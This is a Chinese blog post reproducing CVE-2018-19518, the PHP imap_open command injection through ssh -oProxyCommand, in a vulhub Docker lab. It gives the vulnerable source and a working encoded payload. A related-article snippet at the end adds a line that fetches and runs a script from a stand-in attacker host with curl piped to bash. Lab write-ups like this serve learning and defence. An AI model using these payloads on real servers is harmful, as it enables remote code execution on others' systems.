CVE-2018-19518- imap 远程命令执行漏洞分析

最新推荐文章于 2024-05-13 15:30:53 发布
最新推荐文章于 2024-05-13 15:30:53 发布
阅读量2.4k 收藏 3
点赞数 6
分类专栏: CVE分析 文章标签: php cve
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46436640/article/details/119343765
版权

CVE-2018-19518 IMAP 远程命令执行漏洞分析

文章目录

0x00 漏洞介绍

IMAP协议(因特网消息访问协议)它的主要作用是邮件客户端可以通过这种协议从邮件服务器上获取邮件的信息,下载邮件等。它运行在TCP/IP协议之上,使用的端口是143。在php中调用的是imap_open函数

imap_open( string $mailbox,string $user,string $password

其中参数mailbox,是用来连接邮箱服务器的。它会调用rsh来连接远程shell而,debian/ubuntu中默认使用ssh来代替rsh,如下图。

image-20210802112500244

又因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,所以攻击者通过注入这个参数,最终将导致命令执行漏洞。

ssh -oProxyCommand ="echo test123|tee /tmp/executed"localhost
#其中管道符tee意思是将文件追加到xxx并且在屏幕输出

可以看到尽管没有连接成功,但是我们成功的把命令写入到了文件,所以这也就是我们系统被攻击的成因

0x01 影响版本

Ubuntu、Debian、Red Hat、SUSE

0x02 漏洞复现

docker部署环境、以及Ubuntu20.04本地靶机、BurpSuite、HackBar

首先在Ubuntu 20.04下安装docker/docker-compose:

# 安装curl
sudo apt install curl

# 安装pip
curl -s https://bootstrap.pypa.io/get-pip.py | python3

# 安装docker
apt-get install -y docker.io

# 启动docker
systemctl start docker

#安装compose
pip install docker-compose

# 下载项目
wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip
#因为在github下载,有可能会很慢,所以再分享一个链接
git clone https://gitee.com/puier/vulhub.git


#解压项目
unzip vulhub-master.zip
cd vulhub-master

# 进入漏洞
cd php/CVE-2018-19518

# 启动整个环境
docker-compose up -d

安装pip的过程可能会报错:

ModuleNotFoundError: No module named ‘distutils.util’

这是因为没有下载这个模块,执行下面命令即可

sudo apt install python3-distutils

配置成功以后,查看它的源码发现,源码直接对我们的hostname进行变量接收,并没有做任何过滤,所以我们就可以造成漏洞。

<?php
if(!empty($_POST)) {
    $imap = @imap_open('{'.$_POST['hostname'].':993/imap/ssl}INBOX', $_POST['username'], $_POST['password']);
}
?>
<!doctype html>
<html lang="en">
<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/css/bootstrap.min.css" integrity="sha256-eSi1q2PG6J7g7ib17yAaWMcrr5GrtohYChqibrV7PBE=" crossorigin="anonymous">

    <title>Input your email server</title>
</head>
<body>

<div class="container">
        <h2>Test your email server</h2>
        <?php if(!empty($_POST)): ?>
        <?php if($imap): ?>
            <div class="alert alert-success" role="alert">
                Connect successful!
            </div>
        <?php else: ?>
            <div class="alert alert-danger" role="alert">
                Connect failed!
            </div>
        <?php endif; ?>
        <?php endif; ?>
        <form method="post">
            <div class="form-group">
                <label>Server address</label>
                <input type="text" name="hostname" class="form-control" >
            </div>
            <div class="form-group">
                <label>Username</label>
                <input type="text" name="username" class="form-control" >
            </div>
            <div class="form-group">
                <label>Password</label>
                <input type="password" class="form-control" name="password">
            </div>
            <button type="submit" class="btn btn-primary">Submit</button>
        </form>
</div>


<!-- Optional JavaScript -->
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
<script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" integrity="sha256-FgpCb/KJQlLNfOu91ta32o/NMZxltwRo8QtmkMRdAu8=" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.14.4/dist/umd/popper.min.js" integrity="sha256-EGs9T1xMHdvM1geM8jPpoo8EZ1V1VRsmcJz8OByENLA=" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/js/bootstrap.min.js" integrity="sha256-VsEqElsCHSGmnmHXGQzvoWjWwoznFSZc6hs7ARLRacQ=" crossorigin="anonymous"></script>
</body>
</html>

进行web浏览访问,可以看出是一个登陆邮箱的界面,这时候我们只需在Sever address也就是hostname变量处添加攻击语句即可

image-20210802115049717

#payload
x+-oProxyCommand=echo	echo'1234567890'>/tmp/test0001|base64	-d|sh}
#其中最后一个大括号用来闭合接收变量一开始的括号,类似闭合sql注入里面的单引号. 	-d选项为decode解码 (%3d)=  (%09)TAB		管道符sh,就是把echo'test123'>/tmp/test1 解码以后作为shell脚本的参数,最后在通过ProxyCommand来执行shell

#base64+url编码以后

hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=123&password=123

执行成功以后,进入docker的bash容器,然后查看文件cat /tmp/test0001

docker-compose exec app bash
#不知道我为什么没有app这个服务,所以我换了种方式进入容器

#查看容器id
docker ps
#进入容器
docker exec -it id /bin/bash

进入容器的bash以后打开 cat /tmp/test0001

image-20210802221354643

最后关闭漏洞环境

docker-compose down

参考文献:

https://www.cnblogs.com/biing/p/13049730.html

https://vulhub.org/#/environments/php/CVE-2018-19518/

丶Maple
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
PHP imap 远程命令执行漏洞复现(CVE-2018-19518
0xSec
12-27 1101
IMAP是在系统中执行任何命令的桥梁。Internet消息访问协议(IMAP)是电子邮件客户端用于通过TCP / IP连接从邮件服务器检索电子邮件的Internet标准协议。IMAP由Mark Crispin于1986年设计为远程邮箱协议,与广泛使用的POP(一种用于检索邮箱内容的协议)形成对比。目前,IMAP由RFC 3501定义规格。IMAP的设计目标是允许多个电子邮件客户端完全管理电子邮件收件箱。因此,客户端通常会在服务器上保留消息,直到用户明确删除它们为止。
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
远程执行代码漏洞(CVE-2018-0886)漏洞修复
08-21
CVE-2018-0886 CVE-2018-0886 Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886) windows安全漏洞修复,亲测有效
2024年PHP--远程命令执行漏洞CVE-2018-19518复现(1),2024年最新C C++最牛教材
最新发布
2401_84973631的博客
05-13 202
然后我们访问该ip的8080端口,出现一个登陆界面,这里我们随意输入,准备采取抓包。%09后添加上面进行base64编码后的内容,再将部分内容进行url编码。点击send发送数据包以后,我们准备进入虚拟机查看是否创建成功。这里我们进入容器查看刚才文件是否创建成功,先查询id。使用burp进行抓包,并发送到Repeater里。然后我们进入到该目录下使用docker启动。首先进入环境,最好在root权限下进行。查看容器id后在下面命令中输入id进入。然后我们修改数据包,添加一段执行代码。
cve-2018-19518漏洞复现
m0_74402888的博客
04-28 564
php imap扩展用户在php执行邮件收发操作,其imap_open函数会调用rsh来连接远程shell,而debianh/Ubuntu中默认使用ssh来代替rsh功能,也就是说debian系列系统中,执行rsh命令实际执行的是ssh命令debian系列系统有Ubuntu、kali、MX linux、AntiX、PureOS等ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者可以通过注入这个参数,最终将导致命令执行漏洞
CVE-2018-19518 PHP-IMAP 复现和学习 (环境CTFShow web312)
paidx0
08-09 444
CVE-2018-19518复现和学习 漏洞描述 IMAP协议(因特网消息访问协议)它的主要作用是邮件客户端可以通过这种协议从邮件服务器上获取邮件的信息,下载邮件等。它运行在TCP/IP协议之上,使用的端口是143。在php中调用的是imap_open函数 imap_open( string $mailbox,string $user,string $password) 其中参数mailbox,是用来连接邮箱服务器的。它会调用rsh来连接远程shell而,debian/ubuntu中默认使用ssh来代替rs
PHP imap 远程命令执行漏洞CVE-2018-19158)
qq_43571759的博客
04-15 397
PHP imap 远程命令执行漏洞CVE-2018-19158) php imap扩展用于在PHP执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。 因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击...
PHP imap 远程命令执行漏洞CVE-2018-19518
EC_Carrot的博客
07-19 231
漏洞详细 php imap扩展用于在PHP执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。 因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞漏洞复现 环境启动后,访问http://your-ip:8080即可查看web页面。Web功能是测试一个邮件服务器是否能
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
Cyrus IMAP Server的四个漏洞分析
03-03
Stefan Esser发现了Cyrus IMAP Server的四个漏洞,其中IMAPMAGICPLUS预验证远程缓冲区溢出漏洞最危险,也最容易利用。本文主要介绍对定位漏洞和触发漏洞进行分析,给出了利用程序的实现方法。
OpenSSH 用户名枚举漏洞CVE-2018-15473).zip
03-06
OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。 学习笔记
PHP 远程命令执行漏洞CVE-2018-19518
qq_46501419的博客
03-21 894
CVE-2018-19518详细信息影响范围复现过程 详细信息 在PHP和其他产品的imap_open()中使用的UNIX上的华盛顿大学IMAP工具包2007f启动rsh命令(借助于c-client / imap4r1.c中的imap_rimap函数和osdep / unix / tcp_unix中的tcp_aopen函数.c),而不会阻止参数注入,如果IMAP服务器名称是不受信任的输入(例如,由Web应用程序的用户输入),并且rsh已被具有不同参数的程序替换,则远程攻击者可能会执行任意OS命令语义。 例如
PHP imap 远程命令执行漏洞 CVE-2018-19518 漏洞复现
ADummy的博客
02-25 289
PHP imap 远程命令执行漏洞CVE-2018-19518) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>代码执行 0x01漏洞介绍 ​ php imap扩展用于在PHP执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。 因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令
CVE-2018-19518 漏洞复现
Jay17的博客
02-10 1329
CVE-2018-19518 漏洞复现
[Vulhub] PHP imap远程命令执行漏洞CVE-2018-19518
weixin_45605352的博客
05-08 1636
0x01 预备知识 PHPimap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令php imap扩展用于在PHP执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian / ubuntu中用来使用ssh来代替rsh的功能(即在debian系列系统中,执行rsh命令)实际执行的是ssh命令)。 因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。 如果启用了
PHP 输入验证漏洞 CVE-2018-10547复现
10-24
PHP 输入验证漏洞 CVE-2018-10547是一种远程代码执行漏洞,攻击者可以通过构造恶意IMAP服务器名称来注入任意OS命令语义,从而执行任意代码。以下是复现该漏洞的步骤: 1. 构造恶意IMAP服务器名称,包含“ -oProxyCommand”参数,例如:`127.0.0.1 -oProxyCommand="curl http://attacker.com/malicious.sh|bash"` 2. 在PHP中使用imap_open()函数连接IMAP服务器,将恶意IMAP服务器名称作为参数传入。 3. 当PHP解析恶意IMAP服务器名称时,会执行其中的恶意代码,从而导致远程代码执行漏洞。 为了防止该漏洞的攻击,建议升级openssh到OpenSSH8.4及以上版本,并确保openssl和zlib也已经升级到最新版本。此外,还应该对输入进行严格的验证和过滤,避免恶意输入的注入。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值